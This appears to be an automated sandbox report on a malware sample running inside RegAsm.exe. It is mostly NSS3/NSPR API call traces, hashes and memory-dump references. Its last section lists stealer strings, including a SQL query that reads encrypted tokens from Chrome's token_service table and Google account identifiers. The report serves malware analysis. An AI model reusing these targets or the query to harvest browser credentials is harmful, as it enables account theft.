                                                                                                                                                                                                                                                                  • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C9E4CFD
                                                                                                                                                                                                                                                                  • sqlite3_value_text16.NSS3(?), ref: 6C9E4D44
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: sqlite3_value_text16$sqlite3_log
                                                                                                                                                                                                                                                                  • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                                                                                                                                                                                                  • API String ID: 2274617401-4033235608
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32(6C933F23,?,6C92E477,?,?,?,00000001,00000000,?,?,6C933F23,?), ref: 6C932C62
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(0000001C,?,6C92E477,?,?,?,00000001,00000000,?,?,6C933F23,?), ref: 6C932C76
                                                                                                                                                                                                                                                                  • PL_HashTableLookup.NSS3(00000000,?,?,6C92E477,?,?,?,00000001,00000000,?,?,6C933F23,?), ref: 6C932C86
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(00000000,?,?,?,?,6C92E477,?,?,?,00000001,00000000,?,?,6C933F23,?), ref: 6C932C93
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BDD70: TlsGetValue.KERNEL32 ref: 6C9BDD8C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C9BDDB4
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,6C92E477,?,?,?,00000001,00000000,?,?,6C933F23,?), ref: 6C932CC6
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C92E477,?,?,?,00000001,00000000,?,?,6C933F23,?), ref: 6C932CDA
                                                                                                                                                                                                                                                                  • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C92E477,?,?,?,00000001,00000000,?,?,6C933F23), ref: 6C932CEA
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C92E477,?,?,?,00000001,00000000,?), ref: 6C932CF7
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C92E477,?,?,?,00000001,00000000,?), ref: 6C932D4D
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C932D61
                                                                                                                                                                                                                                                                  • PL_HashTableLookup.NSS3(?,?), ref: 6C932D71
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C932D7E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007AD
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007CD
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007D6
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C89204A), ref: 6C9007E4
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,6C89204A), ref: 6C900864
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C900880
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,6C89204A), ref: 6C9008CB
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(?,?,6C89204A), ref: 6C9008D7
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(?,?,6C89204A), ref: 6C9008FB
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2446853827-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_CallOnce.NSS3(6CA72120,Function_00097E60,00000000,?,?,?,?,6C9A067D,6C9A1C60,00000000), ref: 6C927C81
                                                                                                                                                                                                                                                                    • Part of subcall function 6C894C70: TlsGetValue.KERNEL32(?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894C97
                                                                                                                                                                                                                                                                    • Part of subcall function 6C894C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894CB0
                                                                                                                                                                                                                                                                    • Part of subcall function 6C894C70: PR_Unlock.NSS3(?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894CC9
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C927CA0
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C927CB4
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3 ref: 6C927CCF
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BDD70: TlsGetValue.KERNEL32 ref: 6C9BDD8C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C9BDDB4
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C927D04
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C927D1B
                                                                                                                                                                                                                                                                  • realloc.MOZGLUE(-00000050), ref: 6C927D82
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C927DF4
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3 ref: 6C927E0E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2305085145-0
                                                                                                                                                                                                                                                                  • Opcode ID: 21f8b1dd37a2d4e3e02f0ebf96fbd9e81fcce32f75fda40e1ee6085e6cae9d0a
                                                                                                                                                                                                                                                                  • Instruction ID: 851dd1f4eedf0b925fa550e44aaf1eda14ca52c6d523e174ea231d5506c210d5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21f8b1dd37a2d4e3e02f0ebf96fbd9e81fcce32f75fda40e1ee6085e6cae9d0a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9514675A10212DFDF16AF28CC44A7637B9FB52318F158239DD8463726EB34D852CBA1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894C97
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894CB0
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894CC9
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894D11
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894D2A
                                                                                                                                                                                                                                                                  • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894D4A
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894D57
                                                                                                                                                                                                                                                                  • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894D97
                                                                                                                                                                                                                                                                  • PR_Lock.NSS3(?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894DBA
                                                                                                                                                                                                                                                                  • PR_WaitCondVar.NSS3 ref: 6C894DD4
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894DE6
                                                                                                                                                                                                                                                                  • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894DEF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3388019835-0
                                                                                                                                                                                                                                                                  • Opcode ID: f2162320456d24d45ff6211bcab81afb047865ebb7da6c99d76acdb49777d99b
                                                                                                                                                                                                                                                                  • Instruction ID: 7f0a571caa8fec9c32e7f716f7d66e677e79da1385f01f834efd29d804aca141
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2162320456d24d45ff6211bcab81afb047865ebb7da6c99d76acdb49777d99b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A041B4B9A04716CFCF15AF7CC5941697BF0BF86319F068A29D89897B10E730D885CB91
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_GetCurrentThread.NSS3 ref: 6CA27CE0
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9BF0: TlsGetValue.KERNEL32(?,?,?,6CA20A75), ref: 6C9D9C07
                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA27D36
                                                                                                                                                                                                                                                                  • PR_Realloc.NSS3(?,00000080), ref: 6CA27D6D
                                                                                                                                                                                                                                                                  • PR_GetCurrentThread.NSS3 ref: 6CA27D8B
                                                                                                                                                                                                                                                                  • PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6CA27DC2
                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA27DD8
                                                                                                                                                                                                                                                                  • malloc.MOZGLUE(00000080), ref: 6CA27DF8
                                                                                                                                                                                                                                                                  • PR_GetCurrentThread.NSS3 ref: 6CA27E06
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
                                                                                                                                                                                                                                                                  • String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
                                                                                                                                                                                                                                                                  • API String ID: 530461531-3274975309
                                                                                                                                                                                                                                                                  • Opcode ID: 625f569cedfa7dc17c34c1bc985417ebc3e7520a490419d1f43cc32c2c4b22bf
                                                                                                                                                                                                                                                                  • Instruction ID: cfef439303f48f9085bbda568f8209fc97bf5c9ce3d86a765aaefa3ed1f33f72
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 625f569cedfa7dc17c34c1bc985417ebc3e7520a490419d1f43cc32c2c4b22bf
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D41D6B1A002119FDB04CF28CD9096B37B6FF91318B1D856CE819DBB51D735E981CBA1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C95DE64), ref: 6C95ED0C
                                                                                                                                                                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C95ED22
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA418D0,?), ref: 6C96B095
                                                                                                                                                                                                                                                                  • PL_FreeArenaPool.NSS3(?), ref: 6C95ED4A
                                                                                                                                                                                                                                                                  • PL_FinishArenaPool.NSS3(?), ref: 6C95ED6B
                                                                                                                                                                                                                                                                  • PR_CallOnce.NSS3(6CA72AA4,6C9712D0), ref: 6C95ED38
                                                                                                                                                                                                                                                                    • Part of subcall function 6C894C70: TlsGetValue.KERNEL32(?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894C97
                                                                                                                                                                                                                                                                    • Part of subcall function 6C894C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894CB0
                                                                                                                                                                                                                                                                    • Part of subcall function 6C894C70: PR_Unlock.NSS3(?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894CC9
                                                                                                                                                                                                                                                                  • SECOID_FindOID_Util.NSS3(?), ref: 6C95ED52
                                                                                                                                                                                                                                                                  • PR_CallOnce.NSS3(6CA72AA4,6C9712D0), ref: 6C95ED83
                                                                                                                                                                                                                                                                  • PL_FreeArenaPool.NSS3(?), ref: 6C95ED95
                                                                                                                                                                                                                                                                  • PL_FinishArenaPool.NSS3(?), ref: 6C95ED9D
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9764F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C97127C,00000000,00000000,00000000), ref: 6C97650E
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                                                                                                                                                                                                  • String ID: security
                                                                                                                                                                                                                                                                  • API String ID: 3323615905-3315324353
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3(C_InitToken), ref: 6C942CEC
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C942D07
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: PR_Now.NSS3 ref: 6CA20A22
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CA20A35
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CA20A66
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: PR_GetCurrentThread.NSS3 ref: 6CA20A70
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CA20A9D
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CA20AC8
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: PR_vsmprintf.NSS3(?,?), ref: 6CA20AE8
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: EnterCriticalSection.KERNEL32(?), ref: 6CA20B19
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CA20B48
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CA20C76
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: PR_LogFlush.NSS3 ref: 6CA20C7E
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C942D22
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: OutputDebugStringA.KERNEL32(?), ref: 6CA20B88
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CA20C5D
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6CA20C8D
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CA20C9C
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: OutputDebugStringA.KERNEL32(?), ref: 6CA20CD1
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CA20CEC
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CA20CFB
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CA20D16
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6CA20D26
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CA20D35
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6CA20D65
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6CA20D70
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CA20D90
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: free.MOZGLUE(00000000), ref: 6CA20D99
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C942D3B
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CA20BAB
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CA20BBA
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CA20D7E
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C942D54
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA20BCB
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: EnterCriticalSection.KERNEL32(?), ref: 6CA20BDE
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: OutputDebugStringA.KERNEL32(?), ref: 6CA20C16
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
• Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
                                                                                                                                                                                                                                                                  • String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
                                                                                                                                                                                                                                                                  • API String ID: 420000887-1567254798
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(6C982C2A), ref: 6C980C81
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96BE30: SECOID_FindOID_Util.NSS3(6C92311B,00000000,?,6C92311B,?), ref: 6C96BE44
                                                                                                                                                                                                                                                                    • Part of subcall function 6C958500: SECOID_GetAlgorithmTag_Util.NSS3(6C9595DC,00000000,00000000,00000000,?,6C9595DC,00000000,00000000,?,6C937F4A,00000000,?,00000000,00000000), ref: 6C958517
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C980CC4
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96FAB0: free.MOZGLUE(?,-00000001,?,?,6C90F673,00000000,00000000), ref: 6C96FAC7
                                                                                                                                                                                                                                                                  • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C980CD5
                                                                                                                                                                                                                                                                  • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C980D1D
                                                                                                                                                                                                                                                                  • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C980D3B
                                                                                                                                                                                                                                                                  • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C980D7D
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C980DB5
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C980DC1
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C980DF7
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C980E05
                                                                                                                                                                                                                                                                  • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C980E0F
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9595C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C937F4A,00000000,?,00000000,00000000), ref: 6C9595E0
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9595C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C937F4A,00000000,?,00000000,00000000), ref: 6C9595F5
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9595C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C959609
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9595C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C95961D
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9595C0: PK11_GetInternalSlot.NSS3 ref: 6C95970B
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9595C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C959756
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9595C0: PK11_GetIVLength.NSS3(?), ref: 6C959767
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9595C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C95977E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9595C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C95978E
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3136566230-0
                                                                                                                                                                                                                                                                  • Opcode ID: 05f4047b09ff8ef946612f087f4b657f9baeed1c4acdb7cb07f3fe8c78e014a2
                                                                                                                                                                                                                                                                  • Instruction ID: cac5e7144acfd402442ea28dff9342ed35bb8d72184459125560443ebdf213d0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05f4047b09ff8ef946612f087f4b657f9baeed1c4acdb7cb07f3fe8c78e014a2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D341B1B1902356ABEB009F65DC41BAF7A78AF2130CF105524E9196BB41E735EA14CBE2
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00407F1F
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00408141
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D53: LocalAlloc.KERNEL32(00000040,004131C1,000000C8,00000001,?,004131C0,00000000,00000000), ref: 00410D6C
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 00408166
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00408250
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00408264
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 00406404: _EH_prolog.MSVCRT ref: 00406409
                                                                                                                                                                                                                                                                    • Part of subcall function 00406404: memcmp.MSVCRT ref: 0040642F
                                                                                                                                                                                                                                                                    • Part of subcall function 00406404: memset.MSVCRT ref: 0040645E
                                                                                                                                                                                                                                                                    • Part of subcall function 00406404: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406493
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prologlstrcpylstrlen$AllocLocallstrcat$memcmpmemset
                                                                                                                                                                                                                                                                  • String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
                                                                                                                                                                                                                                                                  • API String ID: 832884763-1713091031
                                                                                                                                                                                                                                                                  • Opcode ID: 31d244d78756d72c4f0cbef9d0c64589c5f562ce78cc967097005f2a4219adf1
